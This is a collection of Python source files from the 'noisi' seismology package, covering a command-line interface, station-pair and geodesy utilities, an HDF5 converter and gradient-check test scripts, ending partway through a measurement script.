"alpha_fraction": 0.5677412748336792,
"alphanum_fraction": 0.5687456130981445,
"avg_line_length": 39.31174087524414,
"blob_id": "be3b1d35cd4ebbb369702e0da09461db2ab91b5f",
"content_id": "4a1258d67c702d7bdba37d167f120cc942dc9803",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9957,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 247,
"path": "/noisi/main.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport sys\nimport os\nimport io\nimport click\nimport json\nimport time\n\nfrom noisi.scripts.source_grid import setup_sourcegrid as setup_sgrid\nfrom noisi.scripts.source_grid_gauss import setup_sourcegrid_gauss as setup_sgrid_gauss\nfrom noisi.scripts.run_correlation import run_corr\nfrom noisi.util.prepare_sem_input import prepare_specfem_input\nfrom noisi.scripts.run_measurement import run_measurement\nfrom noisi.scripts.run_adjointsrcs import run_adjointsrcs\nfrom noisi.scripts.run_kernel import run_kern\nfrom noisi.scripts.run_preprocessing import run_preprocessing\nfrom noisi.scripts.run_preprocessing_data import run_preprocess_data\nfrom noisi.scripts.assemble_gradient import assemble_ascent_dir\nfrom noisi.util.setup_new import setup_proj\[email protected]()\ndef run():\n \"\"\"\n Main routine for noise correlation modeling and noise source inversion.\n \"\"\"\n pass\n \n\n###########################################################################\n### Setting up a new project\n###########################################################################\[email protected](help='Initialize a new project.')\[email protected]('project_name')\ndef setup_project(project_name):\n if os.path.exists(project_name):\n click.echo('Project exists already, must give it a new name.')\n exit()\n else:\n setup_proj(project_name)\n\n click.secho(\"Copied default config.json to project directory, please edit. Use setup_gaussian_grid.ipynb to visually setup gaussian grid.\")\n\n\n###########################################################################\n### Setting up the discretized source grid\n########################################################################### \[email protected](help='Determine the source grid and get specfem STATIONS file.')\[email protected]('project_path')\ndef setup_sourcegrid(project_path):\n \n conf = json.load(open(os.path.join(project_path,'config.json')))\n \n if conf['gauss_grid']:\n setup_sgrid_gauss(os.path.join(project_path,'config.json'))\n else:\n setup_sgrid(os.path.join(project_path,'config.json'))\n\n\n###########################################################################\n### Initialize a source model\n########################################################################### \[email protected](help='Initialize a new source model.')\[email protected]('source_model')\ndef setup_source(source_model):\n\n if os.path.exists(source_model):\n click.echo('Source exists already, must give it a new name.')\n exit()\n\n if not os.path.exists('config.json'):\n click.echo('No config file for project found \\\n (detailing e.g. source grid). Run setup_project first.')\n exit()\n\n os.makedirs(os.path.join(source_model,'step_0'))\n os.mkdir(os.path.join(source_model,'observed_correlations'))\n \n for d in ['adjt','grad','corr','kern']:\n os.mkdir(os.path.join(source_model,'step_0',d))\n\n from . import _ROOT\n \n with io.open(os.path.join(_ROOT,'config','source_config.json'),'r') as fh:\n conf = json.loads(fh.read())\n conf['date_created'] = str(time.strftime(\"%Y.%m.%d\"))\n conf['project_name'] = os.path.basename(os.getcwd())\n conf['project_path'] = os.getcwd()\n conf['source_name'] = source_model\n conf['source_path'] = os.path.abspath(source_model)\n \n with io.open(os.path.join(source_model,'source_config.json'),'w') as fh:\n cf = json.dumps(conf,sort_keys=True, indent=4, separators=(\",\", \": \"))\n fh.write(cf)\n \n with io.open(os.path.join(_ROOT,'config','measr_config.json'),'r') as fh:\n conf = json.loads(fh.read())\n conf['date_created'] = str(time.strftime(\"%Y.%m.%d\"))\n \n with io.open(os.path.join(source_model,'measr_config.json'),'w') as fh:\n cf = json.dumps(conf,sort_keys=True, indent=4, separators=(\",\", \": \"))\n fh.write(cf)\n \n from . import _ROOT\n os.system('cp {} {}'.format(os.path.join(_ROOT,'jnotebks/\\\nsetup_noisesource.ipynb'),\n source_model)) \n os.system('cp {} {}'.format(os.path.join(_ROOT,'util/setup_noisesource.py'),\n source_model))\n os.system('cp {} {}'.format(os.path.join(_ROOT,\n 'util/wavefield_from_instaseis.py'),source_model))\n click.secho(\"Copied default source_config.json and measr_config.json \\\nto source model directory, please edit. \\\nPlease run setup_noisesource.ipynb or setup_noisesource.py after editing to \\\ncreate starting model.\")\n \n\n###########################################################################\n### Preprocess the sytnthetic wavefields\n########################################################################### \[email protected](help='Filter & truncate synthetics before correlation.')\[email protected]('source_model')\ndef preprocess_synthetics(source_model):\n source_model = os.path.join(source_model,'source_config.json')\n source_config = json.load(open(source_model))\n if source_config['preprocess_do']:\n \n dir = os.path.join(source_config['source_path'],'wavefield_processed')\n \n try:\n os.mkdir(dir)\n except:\n pass \n \n run_preprocessing(source_config)\n\n\n###########################################################################\n### Correlations <3\n###########################################################################\[email protected](help='Calculate correlations for selected source model.')\[email protected]('source_model')\[email protected]('step')\ndef correlation(source_model,step):\n source_model = os.path.join(source_model,'source_config.json')\n run_corr(source_model,step)\n \n\n###########################################################################\n### Measure and get adjoint sources\n###########################################################################\[email protected](help='Run measurement and adjoint sources.')\[email protected]('source_model')\n# To do: Include a --test option that produces only plots \n# To do: include a get_parameters_options or something, so that there is no \n# extra step necessary in run_measurement\[email protected]('step')\[email protected]('--ignore_network',is_flag=True)\[email protected]('--step_test',is_flag=True)\ndef measurement(source_model,step,ignore_network,step_test):\n \n measr_config = os.path.join(source_model,'measr_config.json')\n source_model = os.path.join(source_model,'source_config.json')\n \n run_measurement(source_model,measr_config,int(step),ignore_network,\n step_test)\n if not step_test:\n run_adjointsrcs(source_model,measr_config,int(step),ignore_network)\n\n\n###########################################################################\n### Get kernels (without residuals multiplied)\n###########################################################################\[email protected](help='Calculate preliminary kernels.')\[email protected]('source_model')\[email protected]('step')\[email protected]('--ignore_network',is_flag=True)\ndef kernel(source_model,step,ignore_network):\n source_model = os.path.join(source_model,'source_config.json')\n run_kern(source_model,step,ignore_network=ignore_network)\n\n\n###########################################################################\n### Step length test forward model\n###########################################################################\[email protected](help='Calculate fewer correlations for step length test.')\[email protected]('source_model')\[email protected]('step')\ndef step_test(source_model,step):\n source_model = os.path.join(source_model,'source_config.json')\n run_corr(source_model,step,steplengthrun=True)\n\n\n###########################################################################\n### Assemble the gradient by multplying kernels by residuals and summing\n###########################################################################\[email protected](help='Assemble ascent direction from spatial kernels and \\\nmeasurements')\[email protected]('source_model')\[email protected]('step')\[email protected]('--snr_min',default=0.0)\[email protected]('--n_min',default=0)\[email protected]('--normalize',default=False)\ndef gradient(source_model,step,snr_min,n_min,normalize):\n snr_min = float(snr_min)\n source_model = os.path.join(source_model,'source_config.json')\n assemble_ascent_dir(source_model,step,snr_min,\n n_min,normalize_gradient=normalize)\n \n\n\n###########################################################################\n### Older stuff, might be useful again but maybe not\n###########################################################################\n\n###########################################################################\n### Old: prepare input for specfem\n###########################################################################\[email protected](help='Prepare specfem input.')\[email protected]('project_path')\ndef specfem_input(project_path):\n prepare_specfem_input(os.path.join(project_path,'config.json'))\n\n\n###########################################################################\n### Old: Preprocess data (filtering is done anyway by measurement, if asked!)\n########################################################################### \[email protected](help='Preprocess observed correlations')\[email protected]('source_model')\[email protected]('--bandpass',help='Bandpass filter, format: freq1 freq2 corners.',\n default=None)\[email protected]('--decimator',help='Decimation factor. Default obspy antialias \\\nfilter will be run before decimating.',default=None)\[email protected]('--fs_new',help='New sampling rate. Ensure that filtering is \\\nperformed before!',default=None)\ndef preprocess_data(source_model,bandpass,decimator,fs_new):\n\n if bandpass is not None:\n bandpass = [float(bp) for bp in bandpass.split()]\n\n if fs_new is not None:\n fs_new = float(fs_new)\n\n if decimator is not None:\n decimator = int(decimator)\n\n \n run_preprocess_data(source_model,bandpass=bandpass,\n decimator=decimator,Fs_new=fs_new)\n"
},
{
"alpha_fraction": 0.5146095156669617,
"alphanum_fraction": 0.5438286066055298,
"avg_line_length": 26.80788230895996,
"blob_id": "c1bbddc38e6d03d895f6eed6904ecba3ecb8f851",
"content_id": "3ab64a0bf8b17f9c462d89315428275d971db67d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5647,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 203,
"path": "/noisi/util/corr_pairs.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from glob import glob\nimport os\nfrom pandas import read_csv\n\ndef define_correlationpairs(proj_dir,auto_corr=False,\n only_observed=True,channel='*'):\n \"\"\"\n Match correlation pairs.\n :param proj_dir: Path to project directory, where a stations.txt file has to be located\n \n :param auto_corr: Include or exclude autocorrelations\n :return corr_pairs: A list of correlation pairs in the format\n [['net1 sta1 lat1 lon1','net2 sta2 lat2 lon2'],[...]]\n \"\"\"\n \n try:\n stations = read_csv(os.path.join(proj_dir,'stationlist.csv'))\n nets = list(stations.net.values)\n stations = list(stations.sta.values)\n stations = [nets[i]+' '+stations[i] for i in range(len(stations))]\n \n except FileNotFoundError:\n stations = open(os.path.join(proj_dir,'stations.txt'),'r')\n \n stations = stations.read().split('\\n')\n \n stations.sort()\n i = 0\n corr_pairs = []\n \n while i < len(stations):\n sta_0 = stations[i].strip()\n if auto_corr:\n stas_other = stations[i:]\n else:\n stas_other = stations[i+1:]\n i += 1\n\n for sta in stas_other:\n\n if '' in [sta_0,sta]:\n continue\n corr_pairs.append([sta_0,sta])\n\n return corr_pairs\n\n\ndef rem_no_obs(stapairs,source_conf,directory,ignore_network=True):\n\n\n channel = source_conf['channel']\n channel = '??' + channel[-1]\n\n\n stapairs_new = []\n for i in range(len(stapairs)):\n # Check if an observation is actually available\n if stapairs[i] == '':\n break\n \n sta1 = '{}.{}.*.{}'.format(*(stapairs[i][0].split()[0:2]+[channel]))\n sta2 = '{}.{}.*.{}'.format(*(stapairs[i][1].split()[0:2]+[channel]))\n p_new = glob_obs_corr(sta1,sta2,directory,ignore_network)\n \n if p_new ==[]:\n continue\n stapairs_new.append(stapairs[i])\n return stapairs_new\n\n\ndef rem_fin_prs(stapairs,source_conf,step):\n\n \"\"\"\n Remove those station pairs from the list for which correlation / kernel has already \n been calculated.\n :param sta_pairs: List of all station pairs\n :param source_conf: source config dictionary\n :param step: step nr\n \"\"\"\n \n channel = source_conf['channel']\n\n mod_dir = os.path.join(source_conf['source_path'],'step_{}'.format(step),'corr')\n\n\n stapairs_new = []\n \n for sp in stapairs:\n id1 = sp[0].split()[0]+sp[0].split()[1]\n id2 = sp[1].split()[0]+sp[1].split()[1]\n\n if id1 < id2 :\n inf1 = sp[0].split()\n inf2 = sp[1].split()\n else:\n inf2 = sp[0].split()\n inf1 = sp[1].split()\n\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n \n corr_name = \"{}--{}.sac\".format(sta1,sta2) \n corr_name = os.path.join(mod_dir,corr_name)\n if not os.path.exists(corr_name):\n \n stapairs_new.append(sp)\n\n return stapairs_new\n\n# Find the filename of the synthetic correlation from the one of the observed correlation\ndef get_synthetics_filename(obs_filename,dir,synth_location='',\n fileformat='sac',synth_channel_basename='??',ignore_network=True):\n\n inf = obs_filename.split('--')\n\n if len(inf) == 1:\n # old station name format\n inf = obs_filename.split('.')\n net1 = inf[0]\n sta1 = inf[1]\n cha1 = inf[3]\n net2 = inf[4]\n sta2 = inf[5]\n cha2 = inf[7]\n elif len(inf) == 2:\n # new station name format\n inf1 = inf[0].split('.')\n inf2 = inf[1].split('.')\n net1 = inf1[0]\n sta1 = inf1[1]\n net2 = inf2[0]\n sta2 = inf2[1]\n cha1 = inf1[3]\n cha2 = inf2[3]\n\n\n cha1 = synth_channel_basename + cha1[-1]\n cha2 = synth_channel_basename + cha2[-1]\n\n\n sfilename = None\n\n if ignore_network:\n synth_filename1 = '*.{}.{}.{}--*.{}.{}.{}.{}'.format(sta1,synth_location,\n cha1,sta2,synth_location,cha2,fileformat)\n synth_filename2 = '*.{}.{}.{}--*.{}.{}.{}.{}'.format(sta2,synth_location,\n cha2,sta1,synth_location,cha1,fileformat)\n\n try: \n sfilename = glob(os.path.join(dir,synth_filename1))[0] \n except IndexError:\n try:\n sfilename = glob(os.path.join(dir,synth_filename2))[0]\n except IndexError:\n print('No synthetic file found for data:')\n print(obs_filename)\n\n else:\n synth_filename1 = '{}.{}.{}.{}--{}.{}.{}.{}.{}'.format(net1,sta1,synth_location,\n cha1,net2,sta2,synth_location,cha2,fileformat)\n\n try:\n sfilename = glob(os.path.join(dir,synth_filename1))[0] \n \n except IndexError:\n print('No synthetic file found for data:')\n print(obs_filename)\n \n\n return sfilename\n\n\ndef glob_obs_corr(sta1,sta2,directory,ignore_network):\n\n\n inf1 = sta1.split('.')\n inf2 = sta2.split('.')\n\n sta1 = inf1[1]\n sta2 = inf2[1]\n\n cha1 = '??' + inf1[3][-1]\n cha2 = '??' + inf2[3][-1]\n\n if ignore_network:\n net1 = '*'\n net2 = '*'\n else:\n net1 = inf1[0]\n net2 = inf2[0]\n\n\n obs_filename1 = os.path.join(directory,'{}.{}.*.{}*{}.{}.*.{}.*'.format(net1,sta1,cha1,net2,sta2,cha2))\n obs_filename2 = os.path.join(directory,'{}.{}.*.{}*{}.{}.*.{}.*'.format(net2,sta2,cha2,net1,sta1,cha1))\n \n if ignore_network:\n obs_files = glob(obs_filename1)\n obs_files.extend(glob(obs_filename2))\n else:\n obs_files = glob(obs_filename1)\n\n\n return obs_files\n\n\n"
},
{
"alpha_fraction": 0.5158573985099792,
"alphanum_fraction": 0.5481096506118774,
"avg_line_length": 31.23121452331543,
"blob_id": "bfaef2ea907818f4f49557b0f460826d30b20520",
"content_id": "4d6cbb30e1a8388dededfad3ff9b8501945054e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5581,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 173,
"path": "/noisi/util/geo.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom math import pi, sin, cos, sqrt\nfrom obspy.geodetics import gps2dist_azimuth\n\n\ndef wgs84():\n\n # semi-major axis, in m\n a = 6378137.0\n\n # semi-minor axis, in m\n b = 6356752.314245\n\n # inverse flattening f\n f = a/(a-b)\n\n # squared eccentricity e\n e_2 = (a**2-b**2)/a**2\n \n return(a,b,e_2,f)\n\n # geographic to geocentric\ndef geograph_to_geocent(theta):\n # https://en.wikipedia.org/wiki/Latitude#Geocentric_latitude\n e2 = wgs84()[2]\n theta = np.rad2deg(np.arctan((1 - e2) * np.tan(np.deg2rad(theta))))\n return theta\n\ndef len_deg_lon(lat):\n \n (a,b,e_2,f) = wgs84()\n # This is the length of one degree of longitude \n # approx. after WGS84, at latitude lat\n # in m\n lat = pi/180*lat\n dlon = (pi*a*cos(lat))/180*sqrt((1-e_2*sin(lat)**2))\n return round(dlon,5)\n\ndef len_deg_lat(lat):\n # This is the length of one degree of latitude \n # approx. after WGS84, between lat-0.5deg and lat+0.5 deg\n # in m\n lat = pi/180*lat\n dlat = 111132.954 - 559.822 * cos(2*lat) + 1.175*cos(4*lat)\n return round(dlat,5)\n\ndef get_spherical_surface_elements(lon,lat):\n\n # radius...assuming spherical Earth here\n r = 6.378100e6\n # surfel\n surfel = np.zeros(lon.shape)\n colat = 90. - lat\n\n # find neighbours\n for i in range(len(lon)):\n\n # finding the relevant neighbours is very specific to how the grid is\n # set up here (in rings of constant colatitude)!\n\n # get the nearest longitude along the current colatitude \n current_colat = colat[i]\n if current_colat in [0.,180.]:\n # surface area will be 0 at poles.\n continue\n\n colat_idx = np.where(colat==current_colat)\n lon_idx_1 = np.argsort(np.abs(lon[colat_idx]-lon[i]))[1]\n lon_idx_2 = np.argsort(np.abs(lon[colat_idx]-lon[i]))[2]\n closest_lon_1 = lon[colat_idx][lon_idx_1]\n closest_lon_2 = lon[colat_idx][lon_idx_2]\n \n if closest_lon_1 > lon[i] and closest_lon_2 > lon[i]:\n d_lon = np.abs(min(closest_lon_2,closest_lon_1)-lon[i])\n\n elif closest_lon_1 < lon[i] and closest_lon_2 < lon[i]:\n d_lon = np.abs(max(closest_lon_2,closest_lon_1)-lon[i])\n \n else:\n if closest_lon_1 != lon[i] and closest_lon_2 != lon[i]:\n d_lon = np.abs(closest_lon_2 - closest_lon_1) * 0.5\n else:\n d_lon = np.max(np.abs(closest_lon_2-lon[i]),\n np.abs(closest_lon_1-lon[i]))\n\n # wuah...I am fed up so let's do this in a slightly rubbish manner\n colats = np.array(list(set(colat.copy())))\n colat_idx_1 = np.argsort(np.abs(colats-current_colat))[1]\n closest_colat_1 = colats[colat_idx_1]\n colat_idx_2 = np.argsort(np.abs(colats-current_colat))[2]\n closest_colat_2 = colats[colat_idx_2]\n \n\n if (closest_colat_2 > current_colat and \n closest_colat_1 > current_colat):\n d_colat = np.abs(min(closest_colat_1,\n closest_colat_2)-current_colat)\n \n elif (closest_colat_2 < current_colat and \n closest_colat_1 < current_colat):\n d_colat = np.abs(max(closest_colat_1,\n closest_colat_2)-current_colat)\n \n else:\n if (closest_colat_2 != current_colat \n and closest_colat_1 != current_colat):\n d_colat = 0.5 * np.abs(closest_colat_2-closest_colat_1)\n else:\n d_colat = np.max(np.abs(closest_colat_2-current_colat),\n np.abs(closest_colat_1-current_colat))\n\n surfel[i] = np.deg2rad(d_lon) *\\\n np.deg2rad(d_colat) * sin(np.deg2rad(colat[i])) * r**2\n\n\n return(surfel)\n\n\n\n\n\n#ToDo: Tests\ndef points_on_sphere(dx,xmin=-180.,xmax=180.,ymin=-90.,ymax=90.,c_centr=None,\\\nradius=None):\n \"\"\"\n Calculate a more or less equally spaced grid on spherical Earth's surface.\n :param dx: spacing in latitudinal and longitudinal direction in meter\n :type c_centr: Tuple\n :param c_centr: Specify a central location\n :type radius: float\n :param radius: Radius around central location in m; no sources beyond this will be included\n :returns: np.array(latitude, longitude) of grid points, where -180<=lon<180 and -90 <= lat < 90\n \"\"\"\n \n if xmax <= xmin or ymax <= ymin:\n msg = 'Lower bounds must be lower than upper bounds.'\n raise ValueError(msg)\n\n \n gridx = []\n gridy = []\n \n lat = ymin\n \n while lat <= ymax:\n d_lat = dx / len_deg_lat(lat)\n lon = xmin\n while lon <= xmax:\n \n if c_centr and radius:\n if gps2dist_azimuth(lat,lon,c_centr[0],c_centr[1])[0] > radius:\n if abs(lat) != 90.:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n continue\n else:\n break\n \n gridx.append(lon)\n gridy.append(lat)\n \n if abs(lat) == 90:\n # length of a degree longitude will be 0.\n break\n else:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n lat += d_lat # do not start at pole or zero division will raise...\n \n \n # return values sorted by longitude, because basemap complains otherwise.\n grid = list(zip(*sorted(zip(gridx, gridy), key=lambda it: it[0])))\n return grid\n \n"
},
{
"alpha_fraction": 0.6215510964393616,
"alphanum_fraction": 0.6372110247612,
"avg_line_length": 31.69512176513672,
"blob_id": "445536ef7afeb8dcd4d08d2255fcfb93f17f1c96",
"content_id": "ff87345e49c1722601c643a37403aa0fffb8863b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2682,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 82,
"path": "/noisi/util/bin_to_h5.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "#ToDo Docs\n#ToDo build calling into main\n#ToDo check whether these are all the metadata we sensibly need.\n\n\nimport h5py\nimport os\nimport sys\nimport numpy as np\n\n#- User input: -----------------------------------------\n#-------------------------------------------------------\nnbytes_stationname = 512\nsize_of_float = 4\ndata_quantity = 'VEL' #'DIS','VEL','ACC'\n#-------------------------------------------------------\n#-------------------------------------------------------\n\n\n\nf_in = sys.argv[1]\nnbytes_total = os.path.getsize(f_in)\nf_sources = sys.argv[2]\nf_out_name = os.path.splitext(f_in)[0]+'.h5'\n\nf_in = open(f_in,'rb')\nf_sources = np.load(f_sources)\nf_out = h5py.File(f_out_name, \"w\")\n\n# Get metadata\nf_in.seek(nbytes_stationname)\nntimesteps = np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0]\nntimesteps = int(ntimesteps)\nFs = round(np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0],6)\n# Record lengths: station name plus two header values plus length of data array\nnbytes_trace = nbytes_stationname + (2 + ntimesteps) * size_of_float \n# Number of records actually contained\nntraces = int(nbytes_total / nbytes_trace)\nprint('This file contains %g Traces.' %ntraces)\n# Reference station: \n# ToDo: May differentiate location?\nrefstation = os.path.basename(sys.argv[1])\nrefstation = os.path.splitext(refstation)[0]\n\n# DATASET NR 1: STATS\nstats = f_out.create_dataset('stats',data=(0,))\nstats.attrs['reference_station'] = refstation\nstats.attrs['data_quantity'] = data_quantity\nstats.attrs['ntraces'] = ntraces\nstats.attrs['Fs'] = Fs\nstats.attrs['nt'] = int(ntimesteps)\n\n# DATASET NR 2: Source grid\nsources = f_out.create_dataset('sourcegrid',data=f_sources[0:2])\n\n# DATASET Nr 3: Seismograms itself\ntraces = f_out.create_dataset('data',(ntraces,ntimesteps),dtype=np.float32)\n\n\n# jump to the beginning of the trace in the binary file\nf_in.seek(0)\ni = 0\nprint('Starting to read seismograms from: %s' %sys.argv[1])\nwhile i < ntraces:\n if i%10000 == 0:\n print('Converted %g of %g traces' %(i,ntraces))\n # read station name, copy to output file\n staname = f_in.read(nbytes_stationname)\n staname = str(staname.decode('utf-8')).strip()\n # These are only read to jump over the entries\n nt_temp = int(np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0])\n Fs_temp = np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0]\n \n # Get the index of that station -- > This links it with the right source coordinate pair.\n staindex = int(staname.split('.')[1])\n values = np.fromfile(f_in,dtype='f'+str(size_of_float),count=ntimesteps)\n \n # Save in traces array\n traces[staindex,:] += values\n \n i += 1\nf_out.close()\n\n"
},
{
"alpha_fraction": 0.6995024681091309,
"alphanum_fraction": 0.7074626684188843,
"avg_line_length": 34.82143020629883,
"blob_id": "8fac6172131dd29a2a61056e86190f8c0f648a55",
"content_id": "e485251c2534072bedb19b628666b97e4404bb1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1005,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 28,
"path": "/noisi/test/test_aa_noisi.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nos.system(\"noisi\")\nif not os.path.exists(\"test/testdata/testsrc\"):\n sys.exit(\"\\n\\n\\nGo to noisi/noisi directory to run tests.\\n\\n\\n\")\n\ndef test_aa_noisi():\n\n os.system('cp test/testdata/config_archived.json test/testdata/config.json')\n os.system('cp test/testdata/testsrc/source_config_archived.json \\\ntest/testdata/testsrc/source_config.json')\n os.system('cp test/testdata/testsrc/measr_config_archived.json \\\ntest/testdata/testsrc/measr_config.json')\n \n os.system('rm -rf test/testdata/testsrc/wavefield_processed/')\n \n os.system(\"rm -rf test/testdata/testsrc/step_0/corr\")\n #os.mkdir(\"test/testdata/testsrc/step_0/corr\")\n\n os.system(\"rm -rf test/testdata/testsrc/step_0/adjt\")\n #os.mkdir(\"test/testdata/testsrc/step_0/adjt\")\n\n os.system(\"rm -rf test/testdata/testsrc/step_0/kern\")\n #os.mkdir(\"test/testdata/testsrc/step_0/kern\")\n\n os.system(\"rm -rf test/testdata/testsrc/step_0/grad\")\n #os.mkdir(\"test/testdata/testsrc/step_0/grad\")\n\n\n"
},
{
"alpha_fraction": 0.6441042423248291,
"alphanum_fraction": 0.6591458320617676,
"avg_line_length": 29.5,
"blob_id": "a84c24db841b566fc034bee8e924c3917f65c0c3",
"content_id": "98c19f44450794dc0f0861381335be5f1134a923",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3723,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 122,
"path": "/noisi/test/check_gradient.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom obspy import Trace, read\nfrom noisi.scripts import measurements as rm\nfrom noisi.scripts import adjnt_functs as af\nfrom noisi import WaveField, NoiseSource\nimport os\nimport h5py\n\n# necessary data must be located in the test/testdata directory.\n\n# *********************************************\n# input:\n# *********************************************\nsteps = np.arange(-8, 0.5, 0.3)\nmtype = 'ln_energy_ratio' # only ln_energy_ratio can be used.\ng_speed = 3300.\nwindow_params = {}\nwindow_params['bandpass'] \t\t= None\nwindow_params['hw'] = 20\nwindow_params['sep_noise'] = 0.\nwindow_params['win_overlap'] = False\nwindow_params['wtype'] = 'hann'\nwindow_params['causal_side'] = True\nwindow_params['plot'] = False\n# *********************************************\n# *********************************************\n\n# only for testing the test:\n# def l2_simple(tr_1,tr_2):\n# \tmf = np.sum(0.5 * (tr_1.data - tr_2.data) **2)\n# \tadstf = (tr_1.data - tr_2.data)\n# \treturn mf,adstf\n\n# preparations:\nos.mkdir('test/testdata/testsrc/step_0/corr')\nos.system('cp -R test/testdata/testsrc/wavefield_processed_archived \\\ntest/testdata/testsrc/wavefield_processed')\nos.system('cp test/testdata/config_archived.json \\\ntest/testdata/config.json')\nos.system('cp test/testdata/testsrc/measr_config_archived.json \\\n\ttest/testdata/testsrc/measr_config.json')\nos.system('cp test/testdata/testsrc/source_config_archived.json \\\ntest/testdata/testsrc/source_config.json')\n\n\nm_a_options = {'g_speed':g_speed,'window_params':window_params}\nm_func = rm.get_measure_func(mtype) \n\nwf = WaveField('test/testdata/wavefield_vel/NET.STA1..CHA.h5')\nnlocs = wf.stats['ntraces']\n\n\n# create perturbation\nd_q = 2 * (np.random.rand(nlocs,) - 0.5)\n\n\n\n# evaluate original misfit and load original gradient\nm_a_options = {'g_speed':g_speed,'window_params':window_params}\nm_func = rm.get_measure_func(mtype)\n\n# open the files....\nobs = read('test/testdata/testsrc/observed_correlations/*.sac')[0]\nsyn = read('test/testdata/testsrc/step_0/corr_archived/*.sac')[0]\nsyn.stats.sac = {}\nsyn.stats.sac['dist'] = obs.stats.sac.dist\nmsr_o = m_func(obs,**m_a_options)\nmsr_s = m_func(syn,**m_a_options)\n\n# unperturbed misfit\nj = 0.5*(msr_s-msr_o)**2\n# unperturbed gradient\ngrad = np.load('test/testdata/testsrc/step_0/grad_archived/grad_all.npy')\n\n# left hand side of test 3: gradient * dq = change of misfit wrt q\ngrad_dq = np.dot(grad,d_q)\n\ndcheck = []\n# loop:\nfor step in steps:\n# add perturbation to archived model --> current model\n\tos.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5 test/testdata/testsrc/step_0/starting_model.h5')\n\n\tn = h5py.File('test/testdata/testsrc/step_0/starting_model.h5')\n\t\n\tn['distr_basis'][:] += 10.**step * d_q\n\t\n\tn.flush()\n\tn.close()\n# run correlation\n\n\tos.system('noisi correlation test/testdata/testsrc 0')\n\n# evaluate misfit and add to list.\n\tsyn = read('test/testdata/testsrc/step_0/corr/*.sac')[0]\n\tsyn.stats.sac = {}\n\tsyn.stats.sac['dist'] = obs.stats.sac.dist\n\tmsr_sh = m_func(syn,**m_a_options)\n\n\tjh = 0.5 * (msr_sh - msr_o)**2\n\tdjdqh = (jh - j) / (10.**step) \n\t\n\tdcheck.append(abs(grad_dq - djdqh) / abs(grad_dq))\n\n# remove the current synthetics\n\tos.system('rm test/testdata/testsrc/step_0/corr/*')\n\t\n# plot results\n\n# plot\nplt.semilogy(steps,dcheck)\nplt.title(\"Check for gradient\")\nplt.show()\n\n# clean up...\nos.system('rmdir test/testdata/testsrc/step_0/corr')\nos.system('rm test/testdata/config.json')\nos.system('rm test/testdata/testsrc/source_config.json')\nos.system('rm test/testdata/testsrc/measr_config.json')\n\nos.system('rm -rf test/testdata/testsrc/wavefield_processed')\n\n\n"
},
{
"alpha_fraction": 0.49980494379997253,
"alphanum_fraction": 0.5078993439674377,
"avg_line_length": 33.996585845947266,
"blob_id": "38509d216c7585317ffa3390bf4809a2e1ac2066",
"content_id": "62531425569d1f1c10b0535637d7338780c3a59c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10254,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 293,
"path": "/noisi/scripts/run_measurement.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport pandas as pd\nfrom math import log, pi\nimport click\nimport copy\nimport json\nfrom glob import glob\nfrom obspy import read, Trace\nfrom obspy.geodetics import gps2dist_azimuth\nimport matplotlib.pyplot as plt\n#ToDo plot if requested.\nfrom noisi.scripts import measurements as rm\n#from noisi.scripts import adjnt_functs as af\nfrom noisi.util.windows import my_centered, snratio\nfrom noisi.util.corr_pairs import get_synthetics_filename\n# Get and return measurement as a table or something.\nfrom warnings import warn\n\ndef get_station_info(stats):\n\n sta1 = '{}.{}.{}.{}'.format(stats.network,stats.station,stats.location,\n stats.channel)\n\n try:\n sta2 = '{}.{}.{}.{}'.format(stats.sac.kuser0.strip(),stats.sac.kevnm.strip(),\n stats.sac.kuser1.strip(),stats.sac.kuser2.strip())\n except AttributeError:\n sta2 = '{}.{}.{}.{}'.format(stats.sac.kuser0.strip(),stats.sac.kevnm.strip(),\n '',stats.sac.kuser2.strip())\n lat1 = stats.sac.stla\n lon1 = stats.sac.stlo\n lat2 = stats.sac.evla\n lon2 = stats.sac.evlo\n dist = stats.sac.dist\n az,baz = gps2dist_azimuth(lat1,lon1,lat2,lon2)[1:]\n\n\n return([sta1,sta2,lat1,lon1,lat2,lon2,dist,az,baz])\n\n\ndef measurement(source_config,mtype,step,ignore_network,\n bandpass,step_test,taper_perc,**options):\n \n \"\"\"\n Get measurements on noise correlation data and synthetics. \n options: g_speed,window_params (only needed if \n mtype is ln_energy_ratio or enery_diff)\n \"\"\"\n step_n = 'step_{}'.format(int(step))\n\n\n step_dir = os.path.join(source_config['source_path'],\n step_n)\n\n if 